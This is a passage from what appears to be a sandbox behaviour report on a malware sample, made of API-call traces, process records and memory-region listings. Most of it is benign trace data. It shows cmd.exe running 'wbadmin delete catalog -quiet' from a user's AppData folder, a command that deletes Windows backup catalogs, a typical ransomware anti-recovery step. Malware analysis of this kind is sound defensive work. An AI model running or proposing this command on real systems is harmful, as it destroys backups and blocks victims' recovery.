lpFindFileData=0x1beb00) returned 0xffffffffffffffff [0150.714] GetLastError () returned 0x2 [0150.714] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\wbadmin" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\wbadmin"), fInfoLevelId=0x1, lpFindFileData=0x1beb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1beb00) returned 0xffffffffffffffff [0150.715] GetLastError () returned 0x2 [0150.715] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.715] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\wbadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wbadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x1beb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1beb00) returned 0xffffffffffffffff [0150.715] GetLastError () returned 0x2 [0150.715] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\wbadmin" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wbadmin"), fInfoLevelId=0x1, lpFindFileData=0x1beb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1beb00) returned 0xffffffffffffffff [0150.716] GetLastError () returned 0x2 [0150.716] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.716] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.*" (normalized: "c:\\windows\\system32\\wbadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x1beb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1beb00) returned 0x26a2c0 [0150.716] GetProcessHeap () returned 0x250000 [0150.716] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x28) returned 0x2646f0 [0150.716] FindClose (in: hFindFile=0x26a2c0 | out: hFindFile=0x26a2c0) returned 1 [0150.716] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.COM" (normalized: "c:\\windows\\system32\\wbadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x1beb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1beb00) returned 0xffffffffffffffff [0150.716] GetLastError () returned 0x2 [0150.717] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.EXE" (normalized: "c:\\windows\\system32\\wbadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x1beb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1beb00) returned 0x26a2c0 [0150.717] GetProcessHeap () returned 0x250000 [0150.717] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2646f0, Size=0x8) returned 0x26a320 [0150.717] FindClose (in: hFindFile=0x26a2c0 | out: hFindFile=0x26a2c0) returned 1 [0150.717] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0150.717] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0150.717] GetConsoleTitleW (in: lpConsoleTitle=0x1bf050, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0150.717] InitializeProcThreadAttributeList (in: lpAttributeList=0x1bee08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1bedc8 | out: lpAttributeList=0x1bee08, lpSize=0x1bedc8) returned 1 [0150.717] UpdateProcThreadAttribute (in: lpAttributeList=0x1bee08, dwFlags=0x0, Attribute=0x60001, lpValue=0x1bedb8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1bee08, lpPreviousValue=0x0) returned 1 [0150.717] GetStartupInfoW (in: lpStartupInfo=0x1bef20 | out: lpStartupInfo=0x1bef20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0150.718] lstrcmpW (lpString1="\\wbadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0150.720] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wbadmin.exe", lpCommandLine="wbadmin delete catalog -quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpStartupInfo=0x1bee40*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wbadmin delete catalog -quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1bedf0 | out: lpCommandLine="wbadmin delete catalog -quiet", lpProcessInformation=0x1bedf0*(hProcess=0x58, hThread=0x54, dwProcessId=0xd88, dwThreadId=0xd8c)) returned 1 [0150.737] CloseHandle (hObject=0x54) returned 1 [0150.737] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0150.737] GetProcessHeap () returned 0x250000 [0150.737] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ba40 | out: hHeap=0x250000) returned 1 [0150.737] GetEnvironmentStringsW () returned 0x26ae90* [0150.737] GetProcessHeap () returned 0x250000 [0150.737] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb9a) returned 0x26ba40 [0150.738] memcpy (in: _Dst=0x26ba40, _Src=0x26ae90, _Size=0xb9a | out: _Dst=0x26ba40) returned 0x26ba40 [0150.738] FreeEnvironmentStringsW (penv=0x26ae90) returned 1 [0150.738] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0151.622] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x1bed38 | out: lpExitCode=0x1bed38*=0x0) returned 1 [0151.623] CloseHandle (hObject=0x58) returned 1 [0151.623] _vsnwprintf (in: _Buffer=0x1befa8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1bed48 | out: _Buffer="00000000") returned 8 [0151.623] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0151.623] GetProcessHeap () returned 0x250000 [0151.623] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ba40 | out: hHeap=0x250000) returned 1 [0151.623] GetEnvironmentStringsW () returned 0x26ae90* [0151.623] GetProcessHeap () returned 0x250000 [0151.623] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xbc0) returned 0x26d1c0 [0151.623] memcpy (in: _Dst=0x26d1c0, _Src=0x26ae90, _Size=0xbc0 | out: _Dst=0x26d1c0) returned 0x26d1c0 [0151.623] FreeEnvironmentStringsW (penv=0x26ae90) returned 1 [0151.623] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0151.623] GetProcessHeap () returned 0x250000 [0151.623] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d1c0 | out: hHeap=0x250000) returned 1 [0151.623] GetEnvironmentStringsW () returned 0x26ae90* [0151.623] GetProcessHeap () returned 0x250000 [0151.623] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xbc0) returned 0x26d1c0 [0151.623] memcpy (in: _Dst=0x26d1c0, _Src=0x26ae90, _Size=0xbc0 | out: _Dst=0x26d1c0) returned 0x26d1c0 [0151.623] FreeEnvironmentStringsW (penv=0x26ae90) returned 1 [0151.623] GetProcessHeap () returned 0x250000 [0151.623] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26a2c0 | out: hHeap=0x250000) returned 1 [0151.623] DeleteProcThreadAttributeList (in: lpAttributeList=0x1bee08 | out: lpAttributeList=0x1bee08) [0151.623] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.623] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0151.624] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.624] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fee194 | out: lpMode=0x49fee194) returned 1 [0151.624] _get_osfhandle (_FileHandle=0) returned 0x3 [0151.624] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fee198 | out: lpMode=0x49fee198) returned 1 [0151.624] SetConsoleInputExeNameW () returned 0x1 [0151.624] GetConsoleOutputCP () returned 0x1b5 [0151.625] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ffbfe0 | out: lpCPInfo=0x49ffbfe0) returned 1 [0151.625] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0151.625] exit (_Code=0) Process: id = "15" image_name = "wbadmin.exe" filename = "c:\\windows\\system32\\wbadmin.exe" page_root = "0x35eab000" os_pid = "0xd88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xd60" cmd_line = "wbadmin delete catalog -quiet" cur_dir = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f39c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2116 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2117 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2118 start_va = 0x80000 end_va = 0xfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 2119 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2120 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2121 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2122 start_va = 0xffe30000 end_va = 0xffe73fff monitored = 0 entry_point = 0xffe6abc4 region_type = mapped_file name = "wbadmin.exe" filename = "\\Windows\\System32\\wbadmin.exe" (normalized: "c:\\windows\\system32\\wbadmin.exe") Region: id = 2123 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2124 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2125 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 2126 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2127 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2128 start_va = 0x100000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2129 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2130 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2131 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2132 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2133 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2134 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2135 start_va = 0x100000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2136 start_va = 0x1f0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2137 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2138 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2139 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2140 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2141 start_va = 0x7feff760000 end_va = 0x7feff962fff monitored = 0 entry_point = 0x7feff783330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2142 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2143 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2144 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2145 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2146 start_va = 0x7fefdf90000 end_va = 0x7fefe066fff monitored = 0 entry_point = 0x7fefdf93274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2147 start_va = 0x7fefdc80000 end_va = 0x7fefde56fff monitored = 0 entry_point = 0x7fefdc81010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2148 start_va = 0x7fefd9a0000 end_va = 0x7fefd9d5fff monitored = 0 entry_point = 0x7fefd9a1474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2149 start_va = 0x7fefd980000 end_va = 0x7fefd999fff monitored = 0 entry_point = 0x7fefd981558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2150 start_va = 0x7fefb320000 end_va = 0x7fefb32afff monitored = 0 entry_point = 0x7fefb324f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 2151 start_va = 0x7fef4490000 end_va = 0x7fef44c3fff monitored = 0 entry_point = 0x7fef44911e0 region_type = mapped_file name = "credui.dll" filename = "\\Windows\\System32\\credui.dll" (normalized: "c:\\windows\\system32\\credui.dll") Region: id = 2152 start_va = 0x2f0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2153 start_va = 0x2f0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2154 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2155 start_va = 0x50000 end_va = 0x78fff monitored = 0 entry_point = 0x51010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2156 start_va = 0x4b0000 end_va = 0x637fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 2157 start_va = 0x50000 end_va = 0x78fff monitored = 0 entry_point = 0x51010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2158 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2159 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2160 start_va = 0x640000 end_va = 0x7c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 2161 start_va = 0x7d0000 end_va = 0x1bcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 2162 start_va = 0x50000 end_va = 0x7afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wbadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\wbadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\wbadmin.exe.mui") Region: id = 2163 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2164 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2165 start_va = 0x190000 end_va = 0x19cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2166 start_va = 0x1a0000 end_va = 0x1a2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2167 start_va = 0x7fefc2b0000 end_va = 0x7fefc4a3fff monitored = 0 entry_point = 0x7fefc43c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 2168 start_va = 0x7feff2d0000 end_va = 0x7feff340fff monitored = 0 entry_point = 0x7feff2e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2169 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2170 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 2171 start_va = 0x1d80000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 2172 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2173 start_va = 0x1be0000 end_va = 0x1c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 2174 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2175 start_va = 0x3f0000 end_va = 0x46cfff monitored = 0 entry_point = 0x3fcec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2176 start_va = 0x3f0000 end_va = 0x46cfff monitored = 0 entry_point = 0x3fcec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2177 start_va = 0x7fefd670000 end_va = 0x7fefd67efff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2182 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2183 start_va = 0x7feff360000 end_va = 0x7feff3f8fff monitored = 0 entry_point = 0x7feff361c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2184 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2185 start_va = 0x1c90000 end_va = 0x1d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 2186 start_va = 0x7fefd070000 end_va = 0x7fefd087fff monitored = 0 entry_point = 0x7fefd073b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2187 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2188 start_va = 0x3f0000 end_va = 0x434fff monitored = 0 entry_point = 0x3f1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2189 start_va = 0x3f0000 end_va = 0x434fff monitored = 0 entry_point = 0x3f1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2190 start_va = 0x3f0000 end_va = 0x434fff monitored = 0 entry_point = 0x3f1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2191 start_va = 0x3f0000 end_va = 0x434fff monitored = 0 entry_point = 0x3f1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2192 start_va = 0x3f0000 end_va = 0x434fff monitored = 0 entry_point = 0x3f1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2193 start_va = 0x7fefcd70000 end_va = 0x7fefcdb6fff monitored = 0 entry_point = 0x7fefcd71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2194 start_va = 0x1e00000 end_va = 0x20cefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2195 start_va = 0x7fefd760000 end_va = 0x7fefd773fff monitored = 0 entry_point = 0x7fefd7610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2196 start_va = 0x2180000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 2197 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2198 start_va = 0x2330000 end_va = 0x23affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 2199 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2200 start_va = 0x7fef6e30000 end_va = 0x7fef6e3bfff monitored = 0 entry_point = 0x7fef6e354cc region_type = mapped_file name = "blb_ps.dll" filename = "\\Windows\\System32\\blb_ps.dll" (normalized: "c:\\windows\\system32\\blb_ps.dll") Thread: id = 110 os_tid = 0xd8c Thread: id = 111 os_tid = 0xd80 Thread: id = 112 os_tid = 0xd78 Thread: id = 116 os_tid = 0xda8 Thread: id = 117 os_tid = 0xdac Thread: id = 118 os_tid = 0xda0 Process: id = "16" image_name = "wbengine.exe" filename = "c:\\windows\\system32\\wbengine.exe" page_root = "0x32136000" os_pid = "0xda4" os_integrity_level = "0x4000" os_privileges = "0x20860100" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x1d0" cmd_line = "\"C:\\Windows\\system32\\wbengine.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\wbengine" [0xe], "NT AUTHORITY\\Logon Session 00000000:00071035" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2201 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2202 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wbengine.exe.mui" filename = "\\Windows\\System32\\en-US\\wbengine.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\wbengine.exe.mui") Region: id = 2203 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2204 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2205 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2206 start_va = 0x150000 end_va = 0x1b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2207 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2208 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = 